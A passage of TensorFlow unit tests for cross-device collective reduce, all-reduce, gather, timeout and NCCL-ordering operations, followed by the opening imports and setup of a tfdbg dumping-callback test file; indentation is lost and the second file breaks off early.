values=[[7.], [8.]], indices=[3, 2], dense_shape=[10, 1]),
]
inputs = inputs_data[0:group_size]
if group_size == 1:
expect = IndexedSlices(
values=[[1.], [2.]], indices=[0, 1], dense_shape=[10, 1])
elif group_size == 2:
expect = IndexedSlices(
values=[[1.], [2.], [3.], [4.]],
indices=[0, 1, 1, 2],
dense_shape=[10, 1])
elif group_size == 4:
expect = IndexedSlices(
values=[[1.], [2.], [3.], [4.], [5.], [6.], [7.], [8.]],
indices=[0, 1, 1, 2, 7, 8, 3, 2],
dense_shape=[10, 1])
self.reduce_and_verify(inputs, expect, options)
@combinations.generate(
combinations.combine(prefer_unique_instance_key=[True, False]))
def testReduceSparseVariableLength(self, prefer_unique_instance_key):
# One device per process, 2 processes, 2 replicas in total.
inputs = [
IndexedSlicesValue(values=[[1.]], indices=[0], dense_shape=[10, 1]),
IndexedSlicesValue(
values=[[2.], [3.], [4.]], indices=[0, 1, 2], dense_shape=[10, 1]),
]
expect = IndexedSlices(
values=[[1.], [2.], [3.], [4.]],
indices=[0, 0, 1, 2],
dense_shape=[10, 1])
self.reduce_and_verify(
inputs,
expect,
self.RunOptions(
mode=["func_graph"], # Sparse reduce is not supported in eager.
num_processes=2,
reduce_op=ReduceOp.SUM,
prefer_unique_instance_key=prefer_unique_instance_key))
@combinations.generate(
combinations.combine(
num_processes=[1, 2],
required_gpus=[0, 1, 2],
implementation=[
CommunicationImplementation.AUTO,
CommunicationImplementation.RING,
CommunicationImplementation.NCCL,
],
reduce_op=[ReduceOp.SUM, ReduceOp.MEAN],
prefer_unique_instance_key=[True, False]))
def testBatchReduceDense(self, num_processes, required_gpus, implementation,
reduce_op, prefer_unique_instance_key):
if (required_gpus == 0 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip CPU + NCCL combination")
if (num_processes != required_gpus and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip NCCL combination with mismatched process and GPU "
"count. NCCL requires physical GPUs for every process.")
if (num_processes != required_gpus and
implementation == CommunicationImplementation.AUTO):
self.skipTest("Skip potential NCCL combination (AUTO) with mismatched "
"process and GPU count. NCCL requires physical GPUs for "
"every process.")
options = self.RunOptions(
num_processes=num_processes,
gpus_per_process=required_gpus,
reduce_op=reduce_op,
communication_options=collective_util.Options(
implementation=implementation),
prefer_unique_instance_key=prefer_unique_instance_key)
group_size = options.num_processes * (options.gpus_per_process or 1)
inputs_data = [[1.0, 2.0], [3.0, 4.0], [5.0, 6.0], [7.0, 8.0]]
inputs = inputs_data[0:group_size]
if group_size == 1:
expect = [1.0, 2.0]
    elif group_size == 2:
expect = [4.0, 6.0] if reduce_op == ReduceOp.SUM else [2.0, 3.0]
elif group_size == 4:
expect = [16.0, 20.0] if reduce_op == ReduceOp.SUM else [4.0, 5.0]
self.batch_reduce_and_verify(inputs, expect, options)
@combinations.generate(
combinations.combine(
num_processes=[1, 2],
required_gpus=[0, 1, 2],
implementation=[
CommunicationImplementation.AUTO,
CommunicationImplementation.RING,
CommunicationImplementation.NCCL,
],
# TODO(b/166682130): add MEAN reduce once the bug is fixed.
reduce_op=ReduceOp.SUM,
prefer_unique_instance_key=[True, False]))
def testBatchReduceSparse(self, num_processes, required_gpus, implementation,
reduce_op, prefer_unique_instance_key):
if (required_gpus == 0 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip CPU + NCCL combination")
if (num_processes != required_gpus and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip NCCL combination with mismatched process and GPU "
"count. NCCL requires physical GPUs for every process.")
if (num_processes != required_gpus and
implementation == CommunicationImplementation.AUTO):
self.skipTest("Skip potential NCCL combination (AUTO) with mismatched "
"process and GPU count. NCCL requires physical GPUs for "
"every process.")
options = self.RunOptions(
mode=["func_graph"], # Sparse reduce is not supported in eager.
num_processes=num_processes,
gpus_per_process=required_gpus,
reduce_op=reduce_op,
communication_options=collective_util.Options(
implementation=implementation),
prefer_unique_instance_key=prefer_unique_instance_key)
group_size = options.num_processes * (options.gpus_per_process or 1)
inputs_data = ([
IndexedSlicesValue(
values=[[1.], [2.]], indices=[0, 1], dense_shape=[10, 1]),
IndexedSlicesValue(
values=[[3.], [4.]], indices=[1, 2], dense_shape=[5, 1])
], [
IndexedSlicesValue(
values=[[5.], [6.]], indices=[1, 2], dense_shape=[10, 1]),
IndexedSlicesValue(
values=[[7.], [8.]], indices=[0, 1], dense_shape=[5, 1])
], [
IndexedSlicesValue(
values=[[9.], [10.]], indices=[3, 4], dense_shape=[10, 1]),
IndexedSlicesValue(
values=[[11.], [12.]], indices=[3, 4], dense_shape=[5, 1])
], [
IndexedSlicesValue(
values=[[13.], [14.]], indices=[8, 9], dense_shape=[10, 1]),
IndexedSlicesValue(
values=[[15.], [16.]], indices=[3, 4], dense_shape=[5, 1])
])
inputs = inputs_data[0:group_size]
if group_size == 1:
expect = [
IndexedSlices(
values=[[1.], [2.]], indices=[0, 1], dense_shape=[10, 1]),
IndexedSlices(
values=[[3.], [4.]], indices=[1, 2], dense_shape=[5, 1])
]
    elif group_size == 2:
expect = [
IndexedSlices(
values=[[1.], [2.], [5.], [6.]],
indices=[0, 1, 1, 2],
dense_shape=[10, 1]),
IndexedSlices(
values=[[3.], [4.], [7.], [8.]],
indices=[1, 2, 0, 1],
dense_shape=[5, 1])
]
elif group_size == 4:
expect = [
IndexedSlices(
values=[[1.], [2.], [5.], [6.], [9.], [10.], [13.], [14.]],
indices=[0, 1, 1, 2, 3, 4, 8, 9],
dense_shape=[10, 1]),
IndexedSlices(
values=[[3.], [4.], [7.], [8.], [11.], [12.], [15.], [16.]],
indices=[1, 2, 0, 1, 3, 4, 3, 4],
              dense_shape=[5, 1])
]
self.batch_reduce_and_verify(inputs, expect, options)
def testBatchReduceMixedDenseAndSparse(self):
options = self.RunOptions(
num_processes=2,
gpus_per_process=0,
reduce_op=ReduceOp.SUM,
mode=["func_graph"])
inputs_data = [
[
1.0, 2.0,
IndexedSlicesValue(
values=[[1.], [2.]], indices=[0, 1], dense_shape=[10, 1]),
IndexedSlicesValue(
values=[[3.], [4.]], indices=[1, 2], dense_shape=[5, 1])
],
[
3.0, 4.0,
IndexedSlicesValue(
values=[[5.], [6.]], indices=[1, 2], dense_shape=[10, 1]),
IndexedSlicesValue(
values=[[7.], [8.]], indices=[0, 1], dense_shape=[5, 1])
],
]
expect = [
4.0, 6.0,
IndexedSlices(
values=[[1.], [2.], [5.], [6.]],
indices=[0, 1, 1, 2],
dense_shape=[10, 1]),
IndexedSlices(
values=[[3.], [4.], [7.], [8.]],
indices=[1, 2, 0, 1],
dense_shape=[5, 1])
]
self.batch_reduce_and_verify(inputs_data, expect, options)
@combinations.generate(
combinations.combine(
num_processes=[1, 2],
required_gpus=[0, 1, 2],
implementation=[
CommunicationImplementation.AUTO,
CommunicationImplementation.RING,
CommunicationImplementation.NCCL,
],
reduce_op=[ReduceOp.SUM, ReduceOp.MEAN],
))
def testAllReduceDense(self, num_processes, required_gpus, implementation,
reduce_op):
if (required_gpus == 0 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip CPU + NCCL combination")
if (num_processes != required_gpus and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip NCCL combination with mismatched process and GPU "
"count. NCCL requires physical GPUs for every process.")
if (num_processes != required_gpus and
implementation == CommunicationImplementation.AUTO):
self.skipTest("Skip potential NCCL combination (AUTO) with mismatched "
"process and GPU count. NCCL requires physical GPUs for "
"every process.")
def replica_fn():
collective, devices, _ = self.make_collective(num_processes,
required_gpus)
options = collective_util.Options(implementation=implementation)
group_size = num_processes * (required_gpus or 1)
@def_function.function
def collective_all_reduce():
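        # Launch _all_reduce on every local device and collect the per-device
        # results.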
results = []
for replica_id, device in enumerate(devices):
with ops.device(device):
value = constant_op.constant(1.0)
results.append(
collective._all_reduce(reduce_op, value, replica_id, options))
return results
got = collective_all_reduce()
if reduce_op == ReduceOp.SUM:
expect = [1.0 * group_size] * len(devices)
elif reduce_op == ReduceOp.MEAN:
expect = [1.0] * len(devices)
self.assertAllClose(got, expect)
@def_function.function
def collective_batch_all_reduce():
results = []
for replica_id, device in enumerate(devices):
with ops.device(device):
value = (constant_op.constant(1.0), constant_op.constant(2.0))
results.append(
collective._all_reduce(reduce_op, value, replica_id, options))
return results
got = collective_batch_all_reduce()
if reduce_op == ReduceOp.SUM:
expect = [(1.0 * group_size, 2.0 * group_size)] * len(devices)
elif reduce_op == ReduceOp.MEAN:
expect = [(1.0, 2.0)] * len(devices)
self.assertAllClose(got, expect)
get_global_mpr(num_processes).run(replica_fn)
@combinations.generate(
combinations.combine(
num_processes=[1, 2],
required_gpus=[0, 1, 2],
implementation=[
CommunicationImplementation.AUTO,
CommunicationImplementation.RING,
CommunicationImplementation.NCCL,
],
reduce_op=[ReduceOp.SUM, ReduceOp.MEAN],
))
def testAllReduceSparse(self, num_processes, required_gpus, implementation,
reduce_op):
if (required_gpus == 0 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip CPU + NCCL combination")
if (num_processes != required_gpus and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip NCCL combination with mismatched process and GPU "
"count. NCCL requires physical GPUs for every process.")
if (num_processes != required_gpus and
implementation == CommunicationImplementation.AUTO):
self.skipTest("Skip potential NCCL combination (AUTO) with mismatched "
"process and GPU count. NCCL requires physical GPUs for "
"every process.")
def replica_fn():
collective, devices, _ = self.make_collective(num_processes,
required_gpus)
options = collective_util.Options(implementation=implementation)
group_size = num_processes * (required_gpus or 1)
@def_function.function
def collective_all_reduce():
results = []
for replica_id, device in enumerate(devices):
with ops.device(device):
value = IndexedSlices(
values=array_ops.identity([[1.]]),
indices=array_ops.identity([0]),
dense_shape=array_ops.identity([5, 1]))
results.append(
collective._all_reduce(reduce_op, value, replica_id, options))
return results
got = collective_all_reduce()
if reduce_op == ReduceOp.SUM:
expect = [IndexedSlices([[1. * group_size]], [0], [5, 1])
] * len(devices)
elif reduce_op == ReduceOp.MEAN:
expect = [IndexedSlices([[1.]], [0], [5, 1])] * len(devices)
self.assertAllClose(
nest.map_structure(ops.convert_to_tensor, got),
nest.map_structure(ops.convert_to_tensor, expect))
@def_function.function
def collective_batch_all_reduce():
results = []
for replica_id, device in enumerate(devices):
with ops.device(device):
value = (IndexedSlices(
array_ops.identity([[1.]]), array_ops.identity([0]),
array_ops.identity([5, 1])),
IndexedSlices(
array_ops.identity([[3.]]), array_ops.identity([2]),
array_ops.identity([5, 1])))
results.append(
collective._all_reduce(reduce_op, value, replica_id, options))
return results
got = collective_batch_all_reduce()
if reduce_op == ReduceOp.SUM:
expect = [(IndexedSlices([[1. * group_size]], [0], [5, 1]),
IndexedSlices([[3. * group_size]], [2], [5, 1]))
] * len(devices)
elif reduce_op == ReduceOp.MEAN:
expect = [(IndexedSlices([[1.]], [0], [5, 1]),
IndexedSlices([[3.]], [2], [5, 1]))] * len(devices)
self.assertAllClose(
nest.map_structure(ops.convert_to_tensor, got),
nest.map_structure(ops.convert_to_tensor, expect))
get_global_mpr(num_processes).run(replica_fn)
@combinations.generate(
combinations.combine(
num_processes=2,
required_gpus=0,
implementation=CommunicationImplementation.AUTO,
reduce_op=ReduceOp.SUM))
def testAllReduceMixedDenseAndSparse(self, num_processes, required_gpus,
implementation, reduce_op):
if (num_processes != required_gpus and
implementation == CommunicationImplementation.AUTO):
self.skipTest("Skip potential NCCL combination (AUTO) with mismatched "
"process and GPU count. NCCL requires physical GPUs for "
"every process.")
def replica_fn():
collective, devices, _ = self.make_collective(num_processes,
required_gpus)
options = collective_util.Options(implementation=implementation)
group_size = num_processes * (required_gpus or 1)
@def_function.function
def collective_batch_all_reduce():
results = []
for replica_id, device in enumerate(devices):
with ops.device(device):
value = (IndexedSlices(
array_ops.identity([[1.]]), array_ops.identity([0]),
array_ops.identity([5, 1])), array_ops.identity(1.0),
IndexedSlices(
array_ops.identity([[3.]]), array_ops.identity([2]),
array_ops.identity([5, 1])), array_ops.identity(2.0))
results.append(
collective._all_reduce(reduce_op, value, replica_id, options))
return results
got = collective_batch_all_reduce()
expect = [
(IndexedSlices([[1. * group_size]], [0], [5, 1]), 1.0 * group_size,
IndexedSlices([[3. * group_size]], [2], [5, 1]), 2.0 * group_size)
] * len(devices)
self.assertAllClose(
nest.map_structure(ops.convert_to_tensor, got),
nest.map_structure(ops.convert_to_tensor, expect))
get_global_mpr(num_processes).run(replica_fn)
@combinations.generate(
combinations.combine(
num_processes=[1, 2],
required_gpus=[0, 1, 2],
axis=[0, 1, 2],
func_mode=["eager", "func_graph"],
implementation=[
CommunicationImplementation.AUTO,
CommunicationImplementation.RING,
CommunicationImplementation.NCCL,
],
prefer_unique_instance_key=[True, False]))
def testAllGatherSameShape(self, num_processes, required_gpus, implementation,
func_mode, axis, prefer_unique_instance_key):
if (required_gpus == 0 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip CPU + NCCL combination")
if (num_processes != required_gpus and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip NCCL combination with mismatched process and GPU "
"count. NCCL requires physical GPUs for every process.")
if (num_processes != required_gpus and
implementation == CommunicationImplementation.AUTO):
self.skipTest("Skip potential NCCL combination (AUTO) with mismatched "
"process and GPU count. NCCL requires physical GPUs for "
"every process.")
def replica_fn():
CollectiveReplicaLauncher._prefer_unique_instance_key = (
prefer_unique_instance_key)
collective, devices, _ = self.make_collective(num_processes,
required_gpus)
options = collective_util.Options(implementation=implementation)
value = constant_op.constant([[[1, 2], [1, 2]]], dtype=dtypes.float32)
def gather_fn():
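        # Gather the same per-replica value along `axis` across all replicas
        # and return the result from each local device.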
per_replica_value = make_per_replica_value(value, devices)
gathered_values = collective._gather(
per_replica_value, per_replica_value, axis=axis, options=options)
gathered_values = self.as_list(gathered_values)
# Skip checking devices in eager. In eager the device attribute doesn't
# reflect the actual device of the tensor.
if not context.executing_eagerly():
self.assertAllEqual(devices, [v.device for v in gathered_values])
return [ops.convert_to_tensor(v) for v in gathered_values]
group_size = num_processes * (required_gpus or 1)
expect = array_ops.concat([value] * group_size, axis=axis)
per_replica_expect = [ops.convert_to_tensor(expect)] * len(devices)
if func_mode == "eager":
result = gather_fn()
self.assertAllClose(result, per_replica_expect)
if func_mode == "func_graph":
result = def_function.function(gather_fn)()
self.assertAllClose(result, per_replica_expect)
get_global_mpr(num_processes).run(replica_fn)
@combinations.generate(
combinations.combine(
num_processes=[1, 2],
required_gpus=[0, 1, 2],
implementation=[CommunicationImplementation.RING]))
def testCollectiveV2ControlFlow(self, num_processes, required_gpus,
implementation):
def replica_fn():
CollectiveReplicaLauncher._prefer_unique_instance_key = True
collective, devices, _ = self.make_collective(num_processes,
required_gpus)
options = collective_util.Options(implementation=implementation)
value = make_per_replica_value(constant_op.constant([1.]), devices)
@def_function.function
def reduce_fn():
def cond_body():
reduced = collective.reduce(reduce_util.ReduceOp.SUM, value, value,
options)
return math_ops.add_n(self.as_list(reduced)) / len(devices)
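        # Pass the same body to both branches so the collective is traced
        # inside tf.cond control flow.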
return control_flow_ops.cond(
array_ops.identity(False), cond_body, cond_body)
num_replicas = num_processes * len(devices)
self.assertAllEqual(reduce_fn(), [1. * num_replicas])
get_global_mpr(num_processes).run(replica_fn)
@combinations.generate(
combinations.combine(
num_processes=1,
required_gpus=2,
implementation=[
CommunicationImplementation.RING,
CommunicationImplementation.NCCL,
],
prefer_unique_instance_key=[True, False]))
def testMultiThreadedCollectiveLaunchNoInterleave(self, num_processes,
required_gpus,
implementation,
prefer_unique_instance_key):
if (num_processes != required_gpus and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip NCCL combination with mismatched process and GPU "
"count. NCCL requires physical GPUs for every process.")
if (num_processes != required_gpus and
implementation == CommunicationImplementation.AUTO):
self.skipTest("Skip potential NCCL combination (AUTO) with mismatched "
"process and GPU count. NCCL requires physical GPUs for "
"every process.")
def replica_fn():
CollectiveReplicaLauncher._prefer_unique_instance_key = (
prefer_unique_instance_key)
collective, devices, _ = self.make_collective(num_processes,
required_gpus)
options = collective_util.Options(implementation=implementation)
# We would like to simulate the following sequence:
# thread-0 device0 device1
# thread-1 device0 device1
# If the kernel launch sequence is as-is the program will deadlock since
# NCCL requires the launch order to be same on each device.
v0 = make_per_replica_value(1.0, devices)
v1 = make_per_replica_value(2.0, devices)
      # Add a delay to collective_ops.all_reduce according to the input
      # tensor's index in `sequence`.
sequence = [v0.values[0], v1.values[0], v1.values[1], v0.values[1]]
all_reduce = collective_ops.all_reduce
def delayed_all_reduce(input_tensor, *args, **kwargs):
for idx, v in enumerate(sequence):
if input_tensor is v:
time.sleep(idx)
break
return all_reduce(input_tensor, *args, **kwargs)
with test.mock.patch.object(collective_ops, "all_reduce",
delayed_all_reduce):
# We only use NCCL for batch reduce with two or more values, so we use
# two values here.
def thread_fn():
reduced = collective.batch_reduce(reduce_util.ReduceOp.SUM,
[(v0, v0), (v0, v0)], options)
self.assertAllEqual(reduced[0].values, [2.0, 2.0])
self.assertAllEqual(reduced[1].values, [2.0, 2.0])
t = threading.Thread(target=thread_fn)
t.start()
reduced = collective.batch_reduce(reduce_util.ReduceOp.SUM, [(v1, v1),
(v1, v1)],
options)
self.assertAllEqual(reduced[0].values, [4.0, 4.0])
self.assertAllEqual(reduced[1].values, [4.0, 4.0])
t.join()
get_global_mpr(num_processes).run(replica_fn)
@combinations.generate(
combinations.combine(
num_processes=1,
required_gpus=2,
implementation=[
CommunicationImplementation.RING,
CommunicationImplementation.NCCL,
],
prefer_unique_instance_key=[True, False]))
def testInputsAreFunctionArgs(self, num_processes, required_gpus,
implementation, prefer_unique_instance_key):
if (num_processes != required_gpus and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip NCCL combination with mismatched process and GPU "
"count. NCCL requires physical GPUs for every process.")
if (num_processes != required_gpus and
implementation == CommunicationImplementation.AUTO):
self.skipTest("Skip potential NCCL combination (AUTO) with mismatched "
"process and GPU count. NCCL requires physical GPUs for "
"every process.")
def replica_fn():
CollectiveReplicaLauncher._prefer_unique_instance_key = (
prefer_unique_instance_key)
collective, devices, _ = self.make_collective(num_processes,
required_gpus)
options = collective_util.Options(implementation=implementation)
@def_function.function
def reduce_fn(v):
# Function inputs don't have device placement.
self.assertEqual(v.values[0].device, "")
self.assertEqual(v.values[1].device, "")
# We only use NCCL for batch reduce with two or more values, so we use
# two values here.
reduced = collective.batch_reduce(reduce_util.ReduceOp.SUM, [(v, v),
(v, v)],
options)
self.assertEqual(reduced[0].values[0].device, devices[0])
self.assertEqual(reduced[0].values[1].device, devices[1])
self.assertEqual(reduced[1].values[0].device, devices[0])
self.assertEqual(reduced[1].values[1].device, devices[1])
        # Returning Mirrored only evaluates the primary value, which causes
        # hanging.
return [reduced[0].values, reduced[1].values]
v = make_per_replica_value(1.0, devices)
reduced = reduce_fn(v)
self.assertAllClose(reduced, [[2.0, 2.0], [2.0, 2.0]])
get_global_mpr(num_processes).run(replica_fn)
@combinations.generate(
combinations.combine(
num_processes=2,
required_gpus=[0, 1],
implementation=[
CommunicationImplementation.RING,
CommunicationImplementation.NCCL,
],
prefer_unique_instance_key=[True, False]))
def testTimeoutReduceDense(self, num_processes, implementation, required_gpus,
prefer_unique_instance_key):
if (required_gpus == 0 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip CPU + NCCL combination")
if (num_processes != required_gpus and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip NCCL combination with mismatched process and GPU "
"count. NCCL requires physical GPUs for every process.")
if (num_processes != required_gpus and
implementation == CommunicationImplementation.AUTO):
self.skipTest("Skip potential NCCL combination (AUTO) with mismatched "
"process and GPU count. NCCL requires physical GPUs for "
"every process.")
def replica_fn():
CollectiveReplicaLauncher._prefer_unique_instance_key = (
prefer_unique_instance_key)
collective, devices, task_id = self.make_collective(
num_processes, required_gpus)
if task_id != 0:
return
v = make_per_replica_value(1.0, devices)
options = collective_util.Options(
timeout_seconds=1., implementation=implementation)
@def_function.function
def reduce_dense():
return collective.reduce(reduce_util.ReduceOp.SUM, v, v, options)
      # The collective should time out because we only launch it on worker-0,
      # while there're two workers in total.
with self.assertRaises(errors.DeadlineExceededError):
reduce_dense()
get_global_mpr(num_processes).run(replica_fn)
@combinations.generate(
combinations.combine(
num_processes=2,
required_gpus=[0, 1],
implementation=[
CommunicationImplementation.RING,
CommunicationImplementation.NCCL,
],
prefer_unique_instance_key=[True, False]))
def testTimeoutBatchReduceDense(self, num_processes, implementation,
required_gpus, prefer_unique_instance_key):
if (required_gpus == 0 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip CPU + NCCL combination")
if (num_processes != required_gpus and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip NCCL combination with mismatched process and GPU "
"count. NCCL requires physical GPUs for every process.")
if (num_processes != required_gpus and
implementation == CommunicationImplementation.AUTO):
self.skipTest("Skip potential NCCL combination (AUTO) with mismatched "
"process and GPU count. NCCL requires physical GPUs for "
"every process.")
def replica_fn():
CollectiveReplicaLauncher._prefer_unique_instance_key = (
prefer_unique_instance_key)
collective, devices, task_id = self.make_collective(
num_processes, required_gpus)
if task_id != 0:
return
v = make_per_replica_value(1.0, devices)
options = collective_util.Options(
timeout_seconds=1., implementation=implementation)
@def_function.function
def batch_reduce_dense():
return collective.batch_reduce(reduce_util.ReduceOp.SUM,
[(v, v), (v, v)], options)
# The collective should time out because we only launch it on worker-0,
# while there're two workers in total.
with self.assertRaises(errors.DeadlineExceededError):
batch_reduce_dense()
get_global_mpr(num_processes).run(replica_fn)
@combinations.generate(
combinations.combine(
num_processes=2,
required_gpus=[0, 1],
implementation=[
CommunicationImplementation.RING,
CommunicationImplementation.NCCL,
],
prefer_unique_instance_key=[True, False]))
def testTimeoutReduceSparse(self, num_processes, implementation,
required_gpus, prefer_unique_instance_key):
if (required_gpus == 0 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip CPU + NCCL combination")
if (num_processes != required_gpus and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip NCCL combination with mismatched process and GPU "
"count. NCCL requires physical GPUs for every process.")
if (num_processes != required_gpus and
implementation == CommunicationImplementation.AUTO):
self.skipTest("Skip potential NCCL combination (AUTO) with mismatched "
"process and GPU count. NCCL requires physical GPUs for "
"every process.")
def replica_fn():
CollectiveReplicaLauncher._prefer_unique_instance_key = (
prefer_unique_instance_key)
collective, devices, task_id = self.make_collective(
num_processes, required_gpus)
if task_id != 0:
return
v = make_per_replica_value(
IndexedSlicesValue(
values=[[4., 6.]], indices=[1], dense_shape=[5, 2]), devices)
options = collective_util.Options(
timeout_seconds=1., implementation=implementation)
@def_function.function
def reduce_sparse():
return collective.reduce(reduce_util.ReduceOp.SUM, v, v, options)
# The collective should time out because we only launch it on worker-0,
# while there're two workers in total.
with self.assertRaises(errors.DeadlineExceededError):
reduce_sparse()
get_global_mpr(num_processes).run(replica_fn)
@combinations.generate(
combinations.combine(
num_processes=2,
required_gpus=[0, 1],
implementation=[
CommunicationImplementation.RING,
CommunicationImplementation.NCCL,
],
prefer_unique_instance_key=[True, False]))
def testTimeoutBatchReduceSparse(self, num_processes, required_gpus,
implementation, prefer_unique_instance_key):
if (required_gpus == 0 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip CPU + NCCL combination")
if (num_processes != required_gpus and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip NCCL combination with mismatched process and GPU "
"count. NCCL requires physical GPUs for every process.")
if (num_processes != required_gpus and
implementation == CommunicationImplementation.AUTO):
self.skipTest("Skip potential NCCL combination (AUTO) with mismatched "
"process and GPU count. NCCL requires physical GPUs for "
"every process.")
def replica_fn():
CollectiveReplicaLauncher._prefer_unique_instance_key = (
prefer_unique_instance_key)
collective, devices, task_id = self.make_collective(
num_processes, required_gpus)
if task_id != 0:
return
v = make_per_replica_value(
IndexedSlicesValue(
values=[[4., 6.]], indices=[1], dense_shape=[5, 2]), devices)
options = collective_util.Options(
timeout_seconds=1., implementation=implementation)
@def_function.function
def batch_reduce_sparse():
return collective.batch_reduce(reduce_util.ReduceOp.SUM,
[(v, v), (v, v)], options)
# The collective should time out because we only launch it on worker-0,
# while there're two workers in total.
with self.assertRaises(errors.DeadlineExceededError):
batch_reduce_sparse()
get_global_mpr(num_processes).run(replica_fn)
@combinations.generate(combinations.combine(num_processes=1, required_gpus=2))
def testNcclOrdering(self, num_processes, required_gpus):
if num_processes != required_gpus:
self.skipTest("Skip NCCL combination with mismatched process and GPU "
"count. NCCL requires physical GPUs for every process.")
def replica_fn():
CollectiveReplicaLauncher._prefer_unique_instance_key = True
CollectiveReplicaLauncher._prefer_ordering_token = True
collective, devices, _ = self.make_collective(num_processes,
required_gpus)
options = collective_util.Options(
implementation=CommunicationImplementation.NCCL)
v_dense = make_per_replica_value([1.0, 1.0], devices)
v_sparse = make_per_replica_value([
IndexedSlicesValue([[4., 6.], [5., 6.]], [1, 3], [5, 2]),
IndexedSlicesValue([[4., 6.], [5., 6.]], [1, 3], [5, 2]),
], devices)
@def_function.function
def nested_dense():
collective.reduce(reduce_util.ReduceOp.SUM, v_dense, v_dense, options)
@def_function.function
def nested_sparse():
collective.reduce(reduce_util.ReduceOp.SUM, v_sparse, v_sparse, options)
# All collectives, function calls, if clause and while loops should be
# chained by control dependencies, so that the execution order is
# deterministic.
@def_function.function
def f():
# pylint: disable=pointless-statement
collective.reduce(reduce_util.ReduceOp.SUM, v_sparse, v_sparse, options)
# reducing dense value.
collective.reduce(reduce_util.ReduceOp.SUM, v_dense, v_dense, options)
# reducing sparse value.
collective.reduce(reduce_util.ReduceOp.SUM, v_sparse, v_sparse, options)
# reduce dense value in nested tf.function.
nested_dense()
# reduce sparse value in nested tf.function.
nested_sparse()
# reduce dense value in tf.cond.
if array_ops.identity(1.0) > array_ops.identity(2.0):
collective.reduce(reduce_util.ReduceOp.SUM, v_dense, v_dense, options)
else:
v_dense
# reduce sparse value in tf.cond.
if array_ops.identity(1.0) > array_ops.identity(2.0):
v_sparse
else:
collective.reduce(reduce_util.ReduceOp.SUM, v_sparse, v_sparse,
options)
# reduce dense value in tf.while_loop.
i = array_ops.identity(1)
while i < 3:
collective.reduce(reduce_util.ReduceOp.SUM, v_dense, v_dense, options)
i += 1
# reduce sparse value in tf.while_loop.
i = array_ops.identity(1)
while i < 3:
collective.reduce(reduce_util.ReduceOp.SUM, v_sparse, v_sparse,
options)
i += 1
# reducing dense and sparse value again.
collective.reduce(reduce_util.ReduceOp.SUM, v_dense, v_dense, options)
collective.reduce(reduce_util.ReduceOp.SUM, v_sparse, v_sparse, options)
# pylint: enable=pointless-statement
graph = f.get_concrete_function().graph
should_be_ordered = set([
"CollectiveReduceV2", "CollectiveGatherV2", "If", "While",
"StatefulPartitionedCall"
])
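      # Group the ops that should be sequentially ordered by the device they
      # are placed on.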
nodes_by_device = {}
for op in graph.get_operations():
if op.type in should_be_ordered:
if op.device not in nodes_by_device:
nodes_by_device[op.device] = []
nodes_by_device[op.device].append(op)
order = test_util.topological_sort_operations(graph.get_operations())
for device in devices:
device = device_util.canonicalize(device)
# Those function ops don't have device annotations, but they contain
# collectives for both devices so we always include them.
operations = nodes_by_device[device] + nodes_by_device[""]
# Verify that we get all types of nodes we want.
self.assertEqual(set(op.type for op in operations), should_be_ordered)
test_util.assert_sequential_execution(order, operations)
get_global_mpr(num_processes).run(replica_fn)
if __name__ == "__main__":
# Set default inter op thread pool size to one to ensure we don't exhaust the
# thread pool with the additional executors to run collectives in eager.
os.environ["TF_NUM_INTEROP_THREADS"] = "1"
# TODO(b/172304955): figure why logical devices doesn't work.
test_util.main(config_logical_devices=False)
|
dumping_callback_test.py
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Unit tests for tfdbg v2 dumping callback."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import os
import shutil
import tempfile
import threading
from absl.testing import parameterized
import numpy as np
from tensorflow.core.protobuf import debug_event_pb2
from tensorflow.python.debug.lib import debug_events_reader
from tensorflow.python.debug.lib import dumping_callback
from tensorflow.python.debug.lib import dumping_callback_test_lib
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_util
from tensorflow.python.framework import test_util
from tensorflow.python.keras import models
from tensorflow.python.keras.applications import mobilenet_v2
from tensorflow.python.keras.layers import core
from tensorflow.python.keras.layers import recurrent_v2
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
def _create_simple_recurrent_keras_model(input_shape):
"""Create a simple tf.keras model containing a recurrent layer for testing."""
model = models.Sequential()
model.add(recurrent_v2.LSTM(
10,
input_shape=input_shape,
kernel_initializer="zeros",
recurrent_initializer="zeros"))
model.add(core.Dense(1, kernel_initializer="zeros"))
model.compile(loss="mse", optimizer="sgd")
return model
class TracingCallbackTest(
dumping_callback_test_lib.DumpingCallbackTestBase, parameterized.TestCase):
def setUp(self):
super(TracingCallbackTest, self).setUp()
self.dump_root = tempfile.mkdtemp()
def tearDown(self):
if os.path.isdir(self.dump_root):
shutil.rmtree(self.dump_root, ignore_errors=True)
dumping_callback.disable_dump_debug_info()
super(TracingCallbackTest, self).tearDown()
def testInvalidTensorDebugModeCausesError(self):
